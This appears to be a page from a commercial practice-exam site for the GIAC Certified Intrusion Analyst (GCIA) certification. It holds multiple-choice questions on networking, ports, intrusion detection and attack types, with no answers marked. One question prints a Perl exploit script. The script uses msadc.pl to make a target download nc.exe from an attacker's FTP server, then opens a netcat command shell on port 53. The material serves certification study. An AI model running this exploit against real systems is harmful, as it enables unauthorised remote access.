Winter Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: s2p65

Easiest Solution 2 Pass Your Certification Exams

GCIA GIAC GCIA – GIAC Certified Intrusion Analyst Practice Test Free Practice Exam Questions (2025 Updated)

Prepare effectively for your GIAC GCIA GCIA – GIAC Certified Intrusion Analyst Practice Test certification with our extensive collection of free, high-quality practice questions. Each question is designed to mirror the actual exam format and objectives, complete with comprehensive answers and detailed explanations. Our materials are regularly updated for 2025, ensuring you have the most current resources to build confidence and succeed on your first attempt.

Page: 2 / 6
Total 508 questions

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of the tool is as follows:

Which of the following tools is John using to crack the wireless encryption keys?

A.

PsPasswd

B.

AirSnort

C.

Cain

D.

Kismet

Which of the following proxy servers is placed anonymously between the client and remote server and handles all of the traffic from the client?

A.

Caching proxy server

B.

Web proxy server

C.

Forced proxy server

D.

Open proxy server

Which of the following statements best describes the string matching method of signature analysis?

A.

String matching searches specific strings that may indicate an attack.

B.

String matching examines multiple fields from different protocols, such as source address, destination port, or TCP flags.

C.

In string matching, each packet is wrapped in predefined layers of different protocols.

D.

In string matching, an incoming packet is compared, byte by byte, with a single signature, a string of code.

You work as a Network Administrator of a TCP/IP network. You are having DNS resolution problem. Which of the following utilities will you use to diagnose the problem?

A.

IPCONFIG

B.

PING

C.

TRACERT

D.

NSLOOKUP

You work as a Network Administrator for McNeil Inc. The company has a TCP/IP-based network.

You are configuring an Internet connection for your company. Your Internet service provider (ISP) has a UNIX-based server. Which of the following utilities will enable you to access the UNIX server, using a text-based connection?

A.

TELNET

B.

IPCONFIG

C.

PING

D.

FTP

E.

TRACERT

John works as a Network Security Administrator for NetPerfect Inc. The manager of the company has told John that the company's phone bill has increased drastically. John suspects that the company's phone system has been cracked by a malicious hacker. Which attack is used by malicious hackers to crack the phone system?

A.

War dialing

B.

Sequence++ attack

C.

Phreaking

D.

Man-in-the-middle attack

Which of the following ports is the default port for IMAP4 protocol?

A.

TCP port 143

B.

TCP port 25

C.

TCP port 443

D.

TCP port 80

You work as a Network Administrator for NetTech Inc. You want to know the local IP address, subnet mask, and default gateway of a NIC in a Windows 98 computer. Which of the following utilities will you use to accomplish this ?

A.

TRACERT

B.

WINIPCFG

C.

NETSTAT

D.

FDISK

Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 domainbased network. Mark wants to block all NNTP traffic between the network and the Internet. How will he configure the network?

A.

Disable anonymous logins in the NNTP configuration manager.

B.

Block port 25 by configuring the firewall.

C.

Block port 119 by configuring the firewall.

D.

Block TCP port 80 by configuring the firewall.

Which of the following is not a function of the Snort utility?

A.

Routing messages

B.

Packet sniffing

C.

Packet logging

D.

Intrusion detection

In the DNS Zone transfer enumeration, an attacker attempts to retrieve a copy of the entire zone file for a domain from a DNS server. The information provided by the DNS zone can help an attacker gather user names, passwords, and other valuable information. To attempt a zone transfer, an attacker must be connected to a DNS server that is the authoritative server for that zone. Besides this, an attacker can launch a Denial of Service attack against the zone's DNS servers by flooding them with a lot of requests. Which of the following tools can an attacker use to perform a DNS zone transfer?

Each correct answer represents a complete solution. Choose all that apply.

A.

Dig

B.

Host

C.

NSLookup

D.

DSniff

Which of the following is computed from an arbitrary block of digital data for the purpose of detecting accidental errors?

A.

Hash buster

B.

Firewall

C.

Checksum

D.

Hash filter

Which of the following ports is used by e-mail clients to send request to connect to the server?

A.

Port 23

B.

Port 21

C.

Port 25

D.

Port 20

Which of the following are the two different file formats in which Microsoft Outlook saves e-mail messages based on system configuration?

Each correct answer represents a complete solution. Choose two.

A.

.txt

B.

.pst

C.

.xst

D.

.ost

Which of the following password cracking attacks is implemented by calculating all the possible hashes for a set of characters?

A.

Brute force attack

B.

Dictionary attack

C.

Rainbow attack

D.

SQL injection attack

Which of the following commands displays the IPX routing table entries?

A.

sh ipx traffic

B.

sh ipx int e0

C.

sh ipx route

D.

sho ipx servers

Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str) where he should have ideally used printf("%s", str).

What attack will his program expose the Web application to?

A.

Sequence++ attack

B.

Cross Site Scripting attack

C.

Format string attack

D.

SQL injection attack

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

A.

Opens up a SMTP server that requires no username or password

B.

Creates a share called "sasfile" on the target system

C.

Creates an FTP server with write permissions enabled

D.

Opens up a telnet listener that requires no username or password

Which of the following is true for XSS, SQL injection, and RFI?

A.

These are Trojans.

B.

These are hacking tools.

C.

These are types of Web application vulnerabilities.

D.

These are viruses.

Ryan, a malicious hacker submits Cross-Site Scripting (XSS) exploit code to the Website of Internet forum for online discussion. When a user visits the infected Web page, code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft etc. Which of the following types of Cross-Site Scripting attack Ryan intends to do?

A.

SAX

B.

Persistent

C.

Document Object Model (DOM)

D.

Non persistent

At which port does a DHCPv6 client listen for DHCP messages?

A.

TCP port 546

B.

TCP port 547

C.

UDP port 546

D.

UDP port 547

Which of the following can be monitored by using the host-based intrusion detection system (HIDS)?

A.

Computer performance

B.

File system integrity

C.

Computer storage space

D.

DoS attack

Which of the following monitors program activities and modifies malicious activities on a system?

A.

Back door

B.

RADIUS

C.

HIDS

D.

NIDS

Which of the following tools can be used to view active telnet sessions?

A.

Juggernaut

B.

Cgichk

C.

Nikto

D.

Hackbot

Which of the following Linux/UNIX commands is used to delete files permanently so that the files cannot be recovered?

A.

del

B.

shred

C.

erase

D.

rm

Which of the following protocols does IPsec use to perform various security functions in the network?

Each correct answer represents a complete solution. Choose all that apply.

A.

Encapsulating Security Payload

B.

Internet Key Exchange

C.

Skinny Client Control Protocol

D.

Authentication Header

Which of the following is a hardware/software platform that is designed to analyze, detect, and report on security related events. NIPS is designed to inspect traffic and based on its configuration or security policy, it can drop the malicious traffic?

A.

NIPS

B.

HIDS

C.

NIDS

D.

HIPS

Which of the following tools is used to analyze a system and report any unsigned drivers found?

A.

regedit.exe

B.

sigverify.exe

C.

sigverif.exe

D.

msconfig

Which of the following is the unspecified address in IPv6?

A.

1:1:1:1:1:1:1:1

B.

0:0:0:0:0:0:0:0

C.

0:0:0:0:0:0:0:1

D.

1:0:0:0:0:0:0:0

Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?

A.

Propagating Cipher Block Chaining (PCBC) Mode

B.

Cipher Block Chaining (CBC) Mode

C.

Cipher Feedback (CFB) Mode

D.

Electronic Codebook (ECB) Mode

Page: 2 / 6
Total 508 questions
Copyright © 2014-2025 Solution2Pass. All Rights Reserved